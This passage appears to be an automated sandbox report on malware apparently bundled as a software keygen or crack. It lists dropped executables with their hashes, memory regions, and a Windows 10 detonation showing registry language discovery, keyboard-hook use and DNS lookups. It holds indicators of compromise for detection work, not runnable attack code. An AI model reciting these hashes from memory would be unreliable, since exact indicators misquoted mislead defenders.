| SHA256 | 40fd6a0b671a0e5074a206201f57f7731a0d01baab5874b28a9b0f019a451c5a |
| SHA512 | c99f3a5464e1ac02402814401c2cb66a9fafb794356395c1081bdf3c4c3534086498c19efe4055780a52a1bb80db81658c2cb4af5271015af51edf7bd3865e7b |
\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
| MD5 | 7126148bfe5ca4bf7e098d794122a9a3 |
| SHA1 | 3fe6be3ee8bf1a0c99139b146913c8c6acd7dd64 |
| SHA256 | f8c0350d71e5dd14438d477f73915c4845290c7f0620656624722183b76013f5 |
| SHA512 | 0bec6450d1be17489436de7a5186dbcb88089edd4227c3b5484460c9368e5ca0a2d88c385d31989f449a5d8cc347057c80a997682d6c0ed1b9cfcb85c677eb48 |
memory/1916-74-0x0000000000400000-0x0000000000983000-memory.dmp
\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe
| MD5 | 8902f8193024fa4187ca1aad97675960 |
| SHA1 | 37a4840c9657205544790c437698b54ca33bfd9d |
| SHA256 | 95de484851569f225488320d573e398ebc2312b2d85b6c2b255b63b21aebb82f |
| SHA512 | c351204604cb24c45ddb26847a22f5487a2942ad2b2361dbd31ce0a308c281be91658907d7fe04b483f053b7f9b0c680cae11361709ba7552f7921e727241938 |
memory/1916-95-0x0000000000400000-0x0000000000983000-memory.dmp
memory/1916-92-0x0000000000400000-0x0000000000983000-memory.dmp
memory/1916-88-0x0000000000400000-0x0000000000983000-memory.dmp
memory/1916-112-0x0000000000400000-0x0000000000983000-memory.dmp
memory/1916-113-0x0000000000400000-0x0000000000983000-memory.dmp
memory/1916-110-0x0000000000400000-0x0000000000983000-memory.dmp
memory/1916-86-0x0000000000400000-0x0000000000983000-memory.dmp
memory/1916-84-0x0000000000400000-0x0000000000983000-memory.dmp
memory/1916-82-0x0000000000400000-0x0000000000983000-memory.dmp
memory/1916-80-0x0000000000400000-0x0000000000983000-memory.dmp
memory/1916-94-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1916-90-0x0000000000400000-0x0000000000983000-memory.dmp
memory/1916-72-0x0000000000400000-0x0000000000983000-memory.dmp
memory/1916-116-0x0000000000400000-0x0000000000983000-memory.dmp
memory/1916-115-0x0000000000400000-0x0000000000983000-memory.dmp
memory/1356-114-0x0000000000820000-0x00000000009F6000-memory.dmp
\Users\Admin\AppData\Local\Temp\chrome3.exe
| MD5 | 4b0d49f7c8712d7a0d44306309f2e962 |
| SHA1 | 5f0a2536f215babccf860c7ccdeaf7055bb59cad |
| SHA256 | f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60 |
| SHA512 | 50dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b |
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
| MD5 | 13e802bd360e44591d7d23036ce1fd33 |
| SHA1 | 091a58503734848a4716382862526859299ef345 |
| SHA256 | e24c3eda7673062c9b243a09bc91e608f4d9dcc5de27db025b5ad150ae014f2b |
| SHA512 | 8bb52a3b0852cc345be7d4b50b19c3778bcae5cb7ee654aced93772bee6fd22d1e87c484d91afb10af040d7c52b0f1e0b60de47a28d8eeea5e3c6afcead6163b |
memory/1572-143-0x000000013F210000-0x000000013F220000-memory.dmp
memory/936-144-0x0000000000F60000-0x0000000000F80000-memory.dmp
\Users\Admin\AppData\Local\Temp\2.exe
| MD5 | a5bace3c3c2fa1cb766775746a046594 |
| SHA1 | 9998cad5ba39e0be94347fcd2a2affd0c0a25930 |
| SHA256 | 617de4cdc27fb67b299a0d95ff2129d0ea2488040bcfd5f64868a0fab33af7a6 |
| SHA512 | 66f0cb5b820014a8d73bab706de8138d22a4d690d77726ac53b785daf99ed45646c8b0236bf10e209039f78324a63c3ee1c2f7ccf852fa7d579753cb9f659184 |
memory/2308-151-0x0000000000C80000-0x0000000000C88000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\setup.exe
| MD5 | 0ebb4afbb726f3ca17896a0274b78290 |
| SHA1 | b543a593cfa0cc84b6af0457ccdc27c1b42ea622 |
| SHA256 | 2fd099e9c096efb59756565d50243387d7669d60c2088e842f1f5d9ef297b6d2 |
| SHA512 | 284063f08667af11bc593dcb88f19d2bc6b9fd1e2edf368fdc78f07c9956fa3078673ee7dd7ca349e32cb1f848edfeab3b6a758eac5e5c3d36dc1a8764353d11 |
memory/936-160-0x0000000000140000-0x000000000015A000-memory.dmp
\Users\Admin\AppData\Local\Temp\jhuuee.exe
| MD5 | f9be28007149d38c6ccb7a7ab1fcf7e5 |
| SHA1 | eba6ac68efa579c97da96494cde7ce063579d168 |
| SHA256 | 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914 |
| SHA512 | 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171 |
\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe
| MD5 | f250a9c692088cce4253332a205b1649 |
| SHA1 | 109c79124ce2bda06cab50ea5d97294d13d42b20 |
| SHA256 | 0a6c3a23510f93fcdcb6d5acc53ccccbcc51c68f14b1bcbd758ffbf135f8e882 |
| SHA512 | 80553664f188ae35cef1f89d188fb17df8a490367f8d6fa5f9897115bacf776373905bccd599353add684c7fa6c2554d04cbf1a7f6cc87b299d6c51da33c1b5e |
memory/1708-185-0x0000000003F30000-0x0000000004197000-memory.dmp
memory/1708-184-0x0000000003F30000-0x0000000004197000-memory.dmp
memory/1708-183-0x0000000003F30000-0x0000000004197000-memory.dmp
memory/1688-187-0x0000000000400000-0x0000000000667000-memory.dmp
memory/1708-182-0x0000000003F30000-0x0000000004197000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabB9CD.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/1916-197-0x0000000000400000-0x0000000000983000-memory.dmp
memory/1916-208-0x0000000000400000-0x0000000000983000-memory.dmp
memory/1916-207-0x0000000000400000-0x0000000000983000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TarBB76.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\potato.dat
| MD5 | b758f845efdd63b6937dd731211d0dd5 |
| SHA1 | 96abfd8ef7a15cbaa81cf694db6046304fee6a5a |
| SHA256 | 528971a079ccdad72b96209f8a2455474c4054a0b7ea64a77750518acae1d2af |
| SHA512 | fcada516d4c743bb7081435f950e1d28f1a00a214357019f82163c4f0acf78af8cb9a49d49267806496b3f62db180658cd8b18fd962e9fd1d7221641dd93920d |
memory/316-214-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1688-216-0x0000000000400000-0x0000000000667000-memory.dmp
memory/2376-215-0x0000000000400000-0x0000000002B59000-memory.dmp
memory/1572-221-0x0000000000770000-0x000000000077E000-memory.dmp
memory/1660-228-0x000000013F480000-0x000000013F490000-memory.dmp
\Users\Admin\AppData\Local\Temp\RarSFX1\f2217e5f.exe
| MD5 | 0388a1ce1bb8c076387b69ffcb3b40ec |
| SHA1 | 3ec08a53ec024d9be6346440848c37d0e0d7bb80 |
| SHA256 | 448febc4311881856de2c237285907fe9470818e169946b0dbf1362f332e070a |
| SHA512 | ea5af764d0373c8b9a5faf6d7094c76c9c321e227713bceecd49df50fa888e8fd04b1dfe16c4b75a8727717582b06383825e5d4317db1b875951ee240edd71d5 |
memory/1688-230-0x0000000000400000-0x0000000000667000-memory.dmp
\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe
| MD5 | 9a6071c1a67be3fb247f857fe5903bbf |
| SHA1 | 4a2e14763c51537e8695014007eceaf391a3f600 |
| SHA256 | 01a9cb71df1d038bbec243ec7f2c1dd12d65a735297469c7f72be80886842e3c |
| SHA512 | c862ed8670b48e23b081e1c91280599ffdd963e714665b80553b41540cb3584c823a25f05c75e47eaea1473c687a9ef7c9a219d724d059e5bd77ac6d127f5e68 |
memory/2088-263-0x00000000001C0000-0x00000000001DA000-memory.dmp
memory/2088-262-0x0000000000AE0000-0x0000000000AFE000-memory.dmp
memory/2728-250-0x0000000000400000-0x0000000002B4E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
| MD5 | 7009fb80a52366b6c2cd8ec052a65791 |
| SHA1 | db0894463edf3ac11e5ca4b4584e8f10d75810f6 |
| SHA256 | 767c546decf6f669263e4a0a87a0f5d92234e031e9a0de3733fa954a8f3e0255 |
| SHA512 | 26e50e4b3d0b5fe866423b9ae0c02f61882f632fe4a16c05da117c02fae9aea26a6c81458e4b0bc2bda8acd0407565132f8bd6b7d3e828dd90fc280b1f15f079 |
memory/2188-277-0x000000013FF60000-0x000000013FF66000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | 72c72b745e67b994c15c559938b87494 |
| SHA1 | 7d10a003de933173e76d777ea9c70712c270b2f3 |
| SHA256 | d483255eacab11d7ff2c5cf60adc981f666caeda902e2cce8ff01e37d5d30765 |
| SHA512 | 5aa6d04d0acbbb2168dccb3cd9cfc7a5c429f259f773b5a08d0d0c305eef3f085172a7a72e08f81d076ac0e1e92d70d1b2af0450003d3dca73edb759598b6e0c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | bc9d57af296fb2be2e266f37b7e5bcba |
| SHA1 | 18b047ed1a147fe1df5ebb966745190906bf125e |
| SHA256 | cb4726beb254cf40410cf703472cbed4369e59808de6b6161714e672aadd5a98 |
| SHA512 | f4a89cd4520d57f495ac2867e60593dc405757738fb7cdd99322d5b1a3c2665397f9ac1259ba7802d3890af8646dc2503cab15dbf27adbc6039fffb0cfc331ea |
memory/1708-406-0x0000000003F30000-0x0000000004197000-memory.dmp
memory/1708-405-0x0000000003F30000-0x0000000004197000-memory.dmp
memory/1708-404-0x0000000003F30000-0x0000000004197000-memory.dmp
memory/1708-403-0x0000000003F30000-0x0000000004197000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-08 22:29
Reported
2024-11-08 22:32
Platform
win10v2004-20241007-en
Max time kernel
95s
Max time network
144s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |